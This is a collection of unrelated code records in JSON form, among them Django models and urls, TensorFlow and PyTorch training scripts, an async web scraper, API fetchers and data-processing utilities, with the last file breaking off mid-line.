{"seq_id":"613330091","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0002_auto_20170515_0929'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Charity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('goal', models.DecimalField(default=0, max_digits=10, decimal_places=2)),\n ('pic', models.ImageField(null=True, upload_to='charity_image/%Y/%m/%d', blank=True)),\n ('is_active', models.BooleanField(default=True)),\n ],\n options={\n 'verbose_name': 'Charity',\n 'verbose_name_plural': 'Charities',\n },\n ),\n migrations.CreateModel(\n name='CharityDonation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('amount', models.DecimalField(default=0, max_digits=10, decimal_places=2)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('is_active', models.BooleanField(default=True)),\n ('charity', models.ForeignKey(to='app.Charity')),\n ],\n options={\n 'verbose_name': 'Charity Donation',\n 'verbose_name_plural': 'Charity Donations',\n },\n ),\n ]\n","sub_path":"app/migrations/0003_charity_charitydonation.py","file_name":"0003_charity_charitydonation.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"510350820","text":"import tensorflow as tf\nimport tensorflow.contrib.layers as layers\nimport sys\nimport numpy as np\n\n\ndef build_q_func(network, num_experts, hiddens=[256], dueling=True, layer_norm=False, **network_kwargs):\n assert 
isinstance(network, str)\n if isinstance(network, str):\n from baselines.common.models import get_network_builder\n # with tf.variable_scope(\"inp\"):\n inp_network = get_network_builder(network)(**network_kwargs)\n # with tf.variable_scope(\"bel\"):\n bel_network = get_network_builder(network)(**network_kwargs)\n\n def q_func_builder(input_placeholder, belief_placeholder, expert_q_ph, num_actions, scope, reuse=False):\n # input_placeholder = tf.Print(input_placeholder, [input_placeholder], '>>>> INP :', summarize=64*48)\n\n with tf.variable_scope(scope, reuse=reuse):\n # input_placeholder = tf.Print(input_placeholder, [input_placeholder], '>>>> INPUT: ', summarize=100)\n latent_inp = inp_network(input_placeholder)\n if isinstance(latent_inp, tuple):\n if latent_inp[1] is not None:\n raise NotImplementedError(\"DQN is not compatible with recurrent policies yet\")\n latent_inp = latent_inp[0]\n\n latent_inp = layers.flatten(latent_inp)\n\n # belief_placeholder = tf.Print(belief_placeholder, [belief_placeholder], '>>>> BEL :', summarize=64*48)\n\n with tf.variable_scope(scope, reuse=reuse):\n\n with tf.variable_scope(\"bel\", reuse=reuse):\n # residual network takes both input and bel\n latent_bel = bel_network(belief_placeholder)\n if isinstance(latent_bel, tuple):\n if latent_bel[1] is not None:\n raise NotImplementedError(\"DQN is not compatible with recurrent policies yet\")\n latent_bel = latent_bel[0]\n\n latent_bel = layers.flatten(latent_bel)\n stacked = tf.stack([latent_inp, latent_bel], axis=1)\n latent = layers.flatten(stacked)\n\n with tf.variable_scope(\"action_value\"):\n action_out = latent\n for hidden in hiddens:\n action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)\n if layer_norm:\n action_out = layers.layer_norm(action_out, center=True, scale=True)\n action_out = tf.nn.relu(action_out)\n action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)\n\n if dueling:\n with tf.variable_scope(\"state_value\"):\n state_out = latent\n for hidden in hiddens:\n state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)\n if layer_norm:\n state_out = layers.layer_norm(state_out, center=True, scale=True)\n state_out = tf.nn.relu(state_out)\n state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)\n action_scores_mean = tf.reduce_mean(action_scores, 1)\n action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)\n q_out = state_score + action_scores_centered\n else:\n q_out = action_scores\n #q_out = tf.Print(q_out, [q_out], '>>>> FOUT :', summarize=3)\n #expert_q_ph = tf.Print(expert_q_ph, [expert_q_ph], '>>>> EXP :', summarize=3)\n\n q_out = q_out + expert_q_ph\n\n\n return q_out\n\n return q_func_builder\n\n","sub_path":"brl_baselines/rbqnfe_staged/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"3185679","text":"\"\"\"\nREG.RU test task\n================\n\nThe script takes a list of domains, downloads the main page of each domain's site,\nstrips the html formatting, prepends\ntitle, meta:description and meta:keywords as the first three lines, writes the resulting data\nto the output directory and stores the result in the output csv file.\n\nAll files are saved in utf-8 encoding.\nSites with broken encodings are not processed.\n\n\"\"\"\nimport re\n\nimport aiohttp\nimport asyncio\n\nimport os\nimport ssl\n# from html.parser import HTMLParser\nfrom bs4 import BeautifulSoup\n\n# ===========================================\n# Configuration\n\n# Name of the file with the list of domains\nDOMAIN_LIST = 'domains-list.csv'\n\n# Name of the output file with the results table\nOUTPUT_FILENAME = 'result.csv'\n\n# Directory for the downloaded and processed files\nDOWNLOAD_DIR = './downloads/'\n\n# Maximum number of simultaneous connections\nMAX_CONNECTIONS = 100\n\n\n# ===========================================\n# html parser\n\ndef get(d, key, default=None): return d.get(key, default) if d else default\n\ndef parse(doc):\n \"\"\"Parses the downloaded html\n Parses the downloaded html and returns clear text whose first three lines are\n title, meta:keywords and meta:description\n \"\"\"\n\n bs = BeautifulSoup(doc, \"lxml\")\n title = getattr(bs.find('title'), 'string', '')\n keywords = get(bs.find('meta', attrs={'name':'keywords'}), 'content', '')\n description = get(bs.find('meta', attrs={'name':'description'}), 'content', '')\n\n for s in bs('script'): s.extract()\n for s in bs('style'): s.extract()\n text = re.sub(r'\\n+', '\\n', getattr(bs.body, 'text', '').strip())\n\n return \"{}\\n{}\\n{}\\n{}\".format(title, keywords, description, text)\n\n\n# ===========================================\n# Preparatory steps\n\n# Read the input csv file\n# pandas or csv could be used here, but since the format is known it is easiest to parse by hand\n# df = pandas.read_csv(DOMAIN_LIST, usecols=[1])\n\nwith open(DOMAIN_LIST) as f:\n domains = [s.rstrip().split(',')[1] for s in f][1:]\n\n# domains = domains[200:500]\n# domains = ['1nt-c.ru']\n\ntotal = len(domains)\nprocessed = 0\n\nprint('==================================')\nprint('REG.RU Scrap domains test task\\n{} domains to process'.format(len(domains)))\nprint('==================================\\n\\n')\n\n# Prepare the results file; records are appended to it as domains are processed\nwith open(OUTPUT_FILENAME, 'w') as f:\n f.write('dname,status,flag\\n')\n\n# ===========================================\n# Worker coroutines\n\n# Semaphore that limits the number of simultaneous connections\nsem = asyncio.Semaphore(MAX_CONNECTIONS)\n\n\nasync def fetch(session, domain):\n url = 'http://{}/'.format(domain)\n\n def log(s):\n print('{}: {}'.format(url, s))\n\n status = None\n flag = 0\n\n async with sem:\n try:\n async with session.get(url) as response:\n status = response.status\n log('Connected, STATUS: {}'.format(status))\n\n if status == 200:\n raw = await response.read()\n\n data = parse(raw.decode(response.charset or 'utf-8', 'ignore') if raw else '')\n\n fn = os.path.join(DOWNLOAD_DIR, '{}.txt'.format(domain))\n try:\n with open(fn, 'wt', encoding='utf-8') as f:\n f.write(data)\n flag = 1\n except IOError:\n print(\"{}: Can't write file {}\".format(url, fn))\n\n except aiohttp.ClientError as e:\n log('Not connected, ERROR: {}'.format(e))\n\n except UnicodeError as e:\n log(\"UnicodeError, ERROR: {}\".format(e))\n\n with open(OUTPUT_FILENAME, 'ab') as f:\n f.write('{},{},{}\\n'.format(\n domain,\n 'NULL' if status is None else status,\n flag\n ).encode('utf-8'))\n\n global processed\n processed += 1\n\n if processed == total or processed % 50 == 1:\n print('============================= Progress: {} of {} domains processed'.format(processed, total))\n\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n await asyncio.wait([fetch(session, d) for d in domains])\n\n\n# ===========================================\n# Event loop\n\nloop = asyncio.get_event_loop()\n\n\ndef exception_handler(loop, context):\n if isinstance(context['exception'], ssl.CertificateError):\n # ignore CertificateError; otherwise it spills into the logs\n pass # ignore todo: log it?\n else:\n loop.default_exception_handler(context)\n\n\nloop.set_exception_handler(exception_handler)\n\nloop.run_until_complete(main())\n\nloop.close()\n\nprint('Finished')\n","sub_path":"regru.py","file_name":"regru.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"288626625","text":"# this file is based on code publicly available at\n# https://github.com/locuslab/smoothing\n# written by Jeremy Cohen.\n\nimport argparse\nimport time\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader\n\nfrom architectures import ARCHITECTURES\nfrom datasets import DATASETS\nfrom train_utils import AverageMeter, accuracy, log, test\nfrom train_utils import prologue\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('dataset', type=str, choices=DATASETS)\nparser.add_argument('arch', type=str, choices=ARCHITECTURES)\nparser.add_argument('--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--batch', default=256, type=int, metavar='N',\n help='batchsize (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n help='initial learning rate', dest='lr')\nparser.add_argument('--lr_step_size', type=int, default=30,\n help='How often to decrease learning by gamma.')\nparser.add_argument('--gamma', type=float, default=0.1,\n help='LR is multiplied by gamma on schedule.')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--noise_sd', default=0.0, type=float,\n help=\"standard deviation of Gaussian noise for data augmentation\")\nparser.add_argument('--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--id', default=None, type=int,\n help='experiment id, `randint(10000)` if None')\n\n#####################\n# Options added by Salman et al. 
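# --- A runnable reduction of the semaphore pattern used in the scraper above,
# assuming only the standard library; the task count and the limit of 3 are
# illustrative, not values from the original script.
import asyncio

async def _job(sem, i):
    async with sem:                  # at most 3 jobs run concurrently here
        await asyncio.sleep(0.01)
        return i

async def _demo():
    sem = asyncio.Semaphore(3)
    return await asyncio.gather(*(_job(sem, i) for i in range(10)))

# print(asyncio.run(_demo()))       # -> [0, 1, 2, ..., 9]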
(2019)\nparser.add_argument('--resume', action='store_true',\n help='if true, tries to resume training from existing checkpoint')\nparser.add_argument('--pretrained-model', type=str, default='',\n help='Path to a pretrained model')\n\n\n#####################\n# Stability training hyperparameter\nparser.add_argument('--lbd', default=2.0, type=float)\n\n\nargs = parser.parse_args()\nargs.outdir = f\"logs/{args.dataset}/stab/lbd_{args.lbd}/noise_{args.noise_sd}\"\n\n\ndef _cross_entropy(input, targets, reduction='mean'):\n targets_prob = F.softmax(targets, dim=1)\n xent = (-targets_prob * F.log_softmax(input, dim=1)).sum(1)\n if reduction == 'sum':\n return xent.sum()\n elif reduction == 'mean':\n return xent.mean()\n elif reduction == 'none':\n return xent\n else:\n raise NotImplementedError()\n\n\ndef main():\n train_loader, test_loader, criterion, model, optimizer, scheduler, \\\n starting_epoch, logfilename, model_path, device, writer = prologue(args)\n\n for epoch in range(starting_epoch, args.epochs):\n before = time.time()\n train_loss, train_acc = train(train_loader, model, criterion, optimizer, epoch, args.noise_sd, device, writer)\n test_loss, test_acc = test(test_loader, model, criterion, epoch, args.noise_sd, device, writer, args.print_freq)\n after = time.time()\n\n log(logfilename, \"{}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\".format(\n epoch, after - before,\n scheduler.get_lr()[0], train_loss, train_acc, test_loss, test_acc))\n\n # In PyTorch 1.1.0 and later, you should call `optimizer.step()` before `lr_scheduler.step()`.\n # See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate\n scheduler.step(epoch)\n\n torch.save({\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, model_path)\n\n\ndef train(loader: DataLoader, model: torch.nn.Module, criterion, optimizer: Optimizer,\n epoch: int, noise_sd: float, device: torch.device, writer=None):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n losses_reg = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n end = time.time()\n\n # switch to train mode\n model.train()\n\n for i, (inputs, targets) in enumerate(loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n inputs, targets = inputs.to(device), targets.to(device)\n batch_size = inputs.size(0)\n\n # augment inputs with noise\n noise = torch.randn_like(inputs, device=device) * noise_sd\n\n logits = model(inputs)\n logits_n = model(inputs + noise)\n loss_xent = criterion(logits, targets)\n\n stab = _cross_entropy(logits_n, logits)\n loss = loss_xent + args.lbd * stab\n\n acc1, acc5 = accuracy(logits_n, targets, topk=(1, 5))\n losses.update(loss_xent.item(), batch_size)\n losses_reg.update(stab.item(), batch_size)\n top1.update(acc1.item(), batch_size)\n top5.update(acc5.item(), batch_size)\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.avg:.3f}\\t'\n 'Data {data_time.avg:.3f}\\t'\n 'Loss {loss.avg:.4f}\\t'\n 'Acc@1 {top1.avg:.3f}\\t'\n 'Acc@5 {top5.avg:.3f}'.format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n\n if writer:\n writer.add_scalar('loss/train', losses.avg, epoch)\n 
writer.add_scalar('loss/stability', losses_reg.avg, epoch)\n writer.add_scalar('batch_time', batch_time.avg, epoch)\n writer.add_scalar('accuracy/train@1', top1.avg, epoch)\n writer.add_scalar('accuracy/train@5', top5.avg, epoch)\n\n return (losses.avg, top1.avg)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"code/train_stab.py","file_name":"train_stab.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"6823547","text":"from requests_html import HTMLSession\nimport json\nimport time\n\n\nwith open('api.json', 'r') as f:\n api = json.load(f)\nlocation = '&location=10.779614,106.69925'\nradius = '&radius=5000'\nplace_type = '&type=cafe' # renamed from 'type' to avoid shadowing the builtin\nkey = '&key=' + api['api_key']\nquery = 'query=coffee'\nlink = 'https://maps.googleapis.com/maps/api/place/textsearch/json?'\nfinal_link = '{}{}{}{}{}{}'.format(link, query, location, radius, place_type, key)\nnext_page = True\nresults = []\nwhile next_page:\n session = HTMLSession()\n r = session.get(final_link)\n json_format = r.json()\n third_key = json_format['results']\n for coffee in third_key:\n results.append(coffee['name'])\n if 'next_page_token' in json_format:\n page_token = 'pagetoken='\n final_link = '{}{}{}{}'.format(link, page_token, json_format['next_page_token'], key)\n time.sleep(20)\n # 20 can be changed to another value, I used 20 to make sure the next_page_token works\n else:\n next_page = False\nwith open('hcm_coffee.json', 'w+', encoding='utf-8') as file:\n data = json.dumps(results[:50], ensure_ascii=False)\n file.write(data)","sub_path":"Bai9/coffee.py","file_name":"coffee.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"144647406","text":"import numpy as np\nimport math\nimport os\nfrom functools import reduce # needed in Python 3, where reduce is no longer a builtin\nimport matplotlib.pyplot as plt # used by plotSaveTopWords\n\ndef sortTopWords(inputList):\n\tinputList.sort(key=lambda line: int(line[1]))\n\ndef plotSaveTopWords(folderPath, topWordList, index):\n\tsize = len(topWordList[0]) - 2\n\tX = range(0, size)\n\tfor line in topWordList:\n\t\tY = line[2 : size+2]\n\t\tplt.plot(X, Y, label=line[0])\n\t\tprint(\"X is: \" + str(X))\n\t\tprint(\"Y is: \" + str(Y))\n\t\tfig = plt.figure()\n\t\tplt.savefig(folderPath + \"/\" + str(index) + \"-top.jpg\")\n\t\n\treturn\n\ndef matchWord(dictPath, count):\n\tfp = open(dictPath, \"r\")\n\tlines = fp.readlines()\n\tif (count >= len(lines)):\n\t\treturn \"\"\n\telif (len(lines[count].split(\",\")) >= 2):\n\t\treturn lines[count].split(\",\")[1].rstrip()\n\telse:\n\t\treturn \"\"\n\ndef calculateAve(listInput):\n\treturn reduce(lambda x, y: x+y, listInput)/len(listInput)\n\ndef readFile(filePath):\n\tfileContent = np.loadtxt(filePath)\n\treturn fileContent\n\ndef findNumOfSeq(filePath):\n\tfp = open(filePath, \"r\")\n\tlines = fp.readlines()\n\twords = lines[2].split()\n\treturn int(words[1])\n\ndef writeNewFile(filePath, newMatrix):\n\tfp = open(filePath, 'w')\n\tfor line in newMatrix:\n\t\tfp.write(\"%s\\n\" % ','.join(str(part) for part in line))\n\nif (__name__==\"__main__\"):\n\n\tinfo_path = \"lda-seq/info.dat\"\n\tnumOfSeq = findNumOfSeq(info_path)\n\tfor x in range(0, 8):\n\t\ttopicName = \"test\" + str(x) + \".dat\"\n\t\tmatrix = readFile(topicName).tolist()\n\t\tdictPath = \"dict.txt.new\"\n\t\tupdatedMatrix = []\n\t\tcount = 0\n\t\tmatrix.pop(0)\n\t\tfor wordTopicDis in matrix:\n\t\t\tword = matchWord(dictPath, count)\n\t\t\taverage = calculateAve(wordTopicDis)\n\t\t\twordTopicDis.insert(0, word)\n\t\t\twordTopicDis.insert(1, 
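# --- Why the functools import added above matters: in Python 3, reduce is no
# longer a builtin. A one-line check of the average helper's core expression;
# the sample list is illustrative.
from functools import reduce
assert reduce(lambda x, y: x + y, [1, 2, 3]) / len([1, 2, 3]) == 2.0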
average)\n\t\t\tupdatedMatrix.append(wordTopicDis)\n\t\t\tcount += 1\n\t\tupdatedMatrix.sort(key=lambda line: float(line[1]), reverse=True) #Reverse settings for big-to-small\n\t\t#sorted(updatedMatrix, key=lambda line: float(line[1]), reverse=True) This is not working\n\t\ttop20Words = updatedMatrix[0:19]\n\t\twriteNewFile(\"test\" + str(x) + \"word.dat\", updatedMatrix)\n\t\twriteNewFile(\"test\" + str(x) + \"top20words.dat\", top20Words)\n\t\t#plotSaveTopWords(dirName, top20Words, x)\n\n\tpass","sub_path":"program/Python/ProcessFlow/matchSoftware.py","file_name":"matchSoftware.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"18284595","text":"# Author: Tomas Hodan (hodantom@cmp.felk.cvut.cz)\n# Center for Machine Perception, Czech Technical University in Prague\n\n\"\"\"Configuration of the BOP Toolkit.\"\"\"\n\n######## Basic ########\n\n#base_path = r'/media/shbe/data/share-to-docker/bop/'\nbase_path = r'/home/hampus/vision/AugmentedAutoencoder/pytorch3d/data/bop/'\n\n# Folder with the BOP datasets.\ndatasets_path = r'{}bop-tless-dataset'.format(base_path)\n\n# Folder with pose results to be evaluated.\nresults_path = r'{}bop_sample_results/bop_challenge_2019'.format(base_path)\n\n# Folder for the calculated pose errors and performance scores.\neval_path = r'{}eval'.format(base_path)\n\n######## Extended ########\n\n# Folder for outputs (e.g. visualizations).\noutput_path = r'{}output'.format(base_path)\n\n# For offscreen C++ rendering: Path to the build folder of bop_renderer (github.com/thodan/bop_renderer).\nbop_renderer_path = r'/path/to/bop_renderer/build'\n\n# Executable of the MeshLab server.\nmeshlab_server_path = r'/path/to/meshlabserver.exe'\n\nprint(datasets_path)\n","sub_path":"bop_toolkit/bop_toolkit_lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"16594843","text":"# coding:utf-8\n\ndef unpack_sets(obj):\n \"\"\"\n Unpack all ObjectSet[Item] entries into the actual lists, removing the\n Item entry entirely.\n \"\"\"\n if isinstance(obj, dict):\n for key, value in list(obj.items()): # Forward compatibility with Python 3\n if key.endswith(\"Set\"):\n if value is None: # This means no Items!\n items = []\n elif isinstance(value, dict):\n if value.keys() == [\"Item\"]: # This means one or multiple Items!\n items = value[\"Item\"]\n if isinstance(items, dict): # If we only have one Item, wrap it in a list\n items = [items]\n else:\n assert False, \"This should never happen\"\n else:\n assert False, \"This should never happen\"\n obj[key] = items\n map(unpack_sets, obj.values())\n elif isinstance(obj, (list, tuple, set)):\n map(unpack_sets, obj)\n else:\n pass","sub_path":"scalr_client_core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"219657514","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.6\n all_sum = sum(A)\n cur_sum = A[0]\n diff = abs(all_sum - 2 * cur_sum)\n i = 1\n while i < len(A) - 1:\n cur_sum += A[i]\n cur_diff = abs(all_sum - 2 * cur_sum)\n if cur_diff < diff:\n diff = cur_diff\n i += 1\n return 
diff\n","sub_path":"Lesson3-TimeComplexity/3-TapeEquilibrium/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"60625522","text":"import pandas as pd\nfrom pandas.io.json import json_normalize\npd.__version__\nimport matplotlib.pyplot as plt\nimport json\n\n\ndict = {}\ncount = 0\nwith open(\"pullRequests.json\") as json_file:\n json_data = json.load(json_file)\n\ndata = json_data['data']['viewer']['contributedRepositories']['edges']\nresult = json_normalize(data) \nresult\n\nfor index, row in result.iterrows():\n commitId = json_normalize(row['node.pullRequests.edges'])\n count=len(commitId.index)\n name = row['node.name']\n if name not in dict:\n dict[name] = 0\n dict[name] += count\n\ndf = pd.DataFrame.from_dict(dict,orient=\"index\")\nprint(df)\ndf\ndf.plot.bar(subplots=True, figsize=(8, 8))\nplt.show()\n","sub_path":"pullRequests.py","file_name":"pullRequests.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"187399131","text":"from datetime import datetime\n\nfrom sklearn import metrics\n\nfrom config.config import FilePathConfig, ClassifierConfig\nfrom util.util import Util\n\nclass TestResult(object):\n def __init__(self, predicted_class, raw_class_label, labels):\n self.predicted_class = predicted_class\n self.raw_class_label = raw_class_label\n self.labels = labels\n self.macro_precision = None\n self.macro_recall = None\n self.macro_f1 = None\n self.classification_report = None\n self.confusion_matrix = None\n self.prams = ClassifierConfig.classifier_pram_dic[ClassifierConfig.cur_single_model]\n\n def print_report(self):\n predicted_class = self.predicted_class\n raw_class_label = self.raw_class_label\n self.macro_precision = metrics.precision_score(raw_class_label, predicted_class, average=\"macro\")\n self.macro_recall = metrics.recall_score(raw_class_label, predicted_class, average=\"macro\")\n self.macro_f1 = metrics.f1_score(raw_class_label, predicted_class, average=\"macro\")\n\n self.classification_report = metrics.classification_report(raw_class_label, predicted_class,\n target_names=self.labels, digits=4)\n self.confusion_matrix = metrics.confusion_matrix(raw_class_label, predicted_class)\n\n Util.log_tool.log.info(self.classification_report.encode(FilePathConfig.file_encodeing))\n Util.log_tool.log.info(\n \"macro_precision:\" + str(self.macro_precision) + \",macro_recall:\" + str(\n self.macro_recall) + \"macro_f1:\" + str(self.macro_f1))\n self.save_report()\n\n def save_report(self):\n time = datetime.now().strftime(\"-%Y-%m-%d-%H-%M\")\n if ClassifierConfig.is_single_model:\n model_name = ClassifierConfig.cur_single_model\n else:\n model_name = ClassifierConfig.vote_name\n\n label = time + '-' + model_name\n\n Util.save_object_into_pkl(self, str(FilePathConfig.result_report_path) % label)\n","sub_path":"evaluation/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"517362962","text":"# wandb initialization\n# Import callback function\nimport wandb\nfrom wandb.keras import WandbCallback\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras import models, layers, optimizers, losses, utils, 
datasets\n\nwandb.init(project=\"atvt-board\")\n\nprint(\"Packge Loaded!\")\n\nwandb.log({\"generated_samples\":\n [wandb.Object3D(open(\"../data/Building,.obj\"))]})\n\n# Data Loading\n(train_x, train_y), (test_x, test_y) = datasets.mnist.load_data()\ntrain_x, test_x = np.reshape(train_x/255., [-1, 784]), np.reshape(test_x/255., [-1, 784])\n\nprint(\"Train Data's Shape : \", train_x.shape, train_y.shape)\nprint(\"Test Data's Shape : \", test_x.shape, test_y.shape)\n\n# Network Building\n## Using Sequential\nmlp = models.Sequential()\nmlp.add(layers.Dense(256, activation='relu', input_shape=(784,)))\nmlp.add(layers.Dense(128, activation='relu'))\nmlp.add(layers.Dense(10, activation='softmax'))\n\nprint(\"Network Built!\")\n\nmlp.compile(optimizer=optimizers.Adam(), loss=losses.sparse_categorical_crossentropy, metrics=['accuracy'])\n\nhistory = mlp.fit(train_x, train_y, epochs=10, batch_size=8,\n validation_data=(test_x, test_y),\n callbacks=[WandbCallback()]) # callbacks 에 Wandbcallback 추가\n","sub_path":"BE/Modeling/xlnet-advance/archive/wandb_setting_test.py","file_name":"wandb_setting_test.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"389441988","text":"\"\"\"case_study URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import routers\nfrom app.views import FundViewSet, CommitViewSet, CallViewSet, FundInvestViewSet, DashboardViewSet, CalculateViewSet\n\nfund_list = FundViewSet.as_view({'get': 'list','post':'create'})\nfund_detail = FundViewSet.as_view({'get': 'retrieve','put':'update'})\n\ncommit_list = CommitViewSet.as_view({'get': 'list','post':'create'})\ncommit_detail = CommitViewSet.as_view({'get': 'retrieve'})\n\ncall_list = CallViewSet.as_view({'get': 'list','post':'create'})\ncall_detail = CallViewSet.as_view({'get': 'retrieve'})\n\nfundinvest_list = FundInvestViewSet.as_view({'get': 'list','post':'create'})\nfundinvest_detail = FundInvestViewSet.as_view({'get': 'retrieve'})\n\nsummary_list = DashboardViewSet.as_view({'get': 'list'})\n\ncalculateSummary_list = CalculateViewSet.as_view({'get': 'list'})\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.SimpleRouter()\nrouter.register(r'funds', FundViewSet, basename='fund')\nrouter.register(r'commits', CommitViewSet, basename='commit')\nrouter.register(r'calls', CallViewSet, basename='call')\nrouter.register(r'invests', FundInvestViewSet, basename='invest')\nrouter.register(r'summary', DashboardViewSet, basename='summary')\nrouter.register(r'calculate', CalculateViewSet, basename='calculate')\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls')),\n]\n","sub_path":"case_study/case_study/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"461741169","text":"#!/usr/bin/env python\n\n######################################################.\n# \t\t This file stores all the functions \t #\n# \t \t used in the LOG file analyzer\t \t #\n######################################################.\n\nimport os\nimport sys\nimport subprocess\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom pyconfort.writer_functions import input_route_line\nfrom pyconfort.argument_parser import possible_atoms\n\npossible_atoms = possible_atoms()\n\ndef moving_log_files(source, destination, file):\n\ttry:\n\t\tos.makedirs(destination)\n\t\tshutil.move(source, destination)\n\texcept OSError:\n\t\tif os.path.isdir(destination) and not os.path.exists(destination+file):\n\t\t\tshutil.move(source, destination)\n\t\telse:\n\t\t\traise\n\n# DETECTION OF GEN/GENECP\ndef check_for_gen_or_genecp(ATOMTYPES,args):\n\t# Options for genecp\n\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = [],False,False,None\n\n\tfor _,atomtype in enumerate(ATOMTYPES):\n\t\tif atomtype not in ecp_list and atomtype in possible_atoms:\n\t\t\tecp_list.append(atomtype)\n\t\tif atomtype in args.genecp_atoms:\n\t\t\tecp_genecp_atoms = True\n\t\tif atomtype in args.gen_atoms:\n\t\t\tecp_gen_atoms = True\n\tif ecp_gen_atoms:\n\t\tgenecp = 'gen'\n\tif ecp_genecp_atoms:\n\t\tgenecp = 'genecp'\n\n\treturn ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp\n\ndef write_header_and_coords(fileout,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS):\n\tfileout.write(\"%mem=\"+str(args.mem)+\"\\n\")\n\tfileout.write(\"%nprocshared=\"+str(args.nprocs)+\"\\n\")\n\tfileout.write(\"# 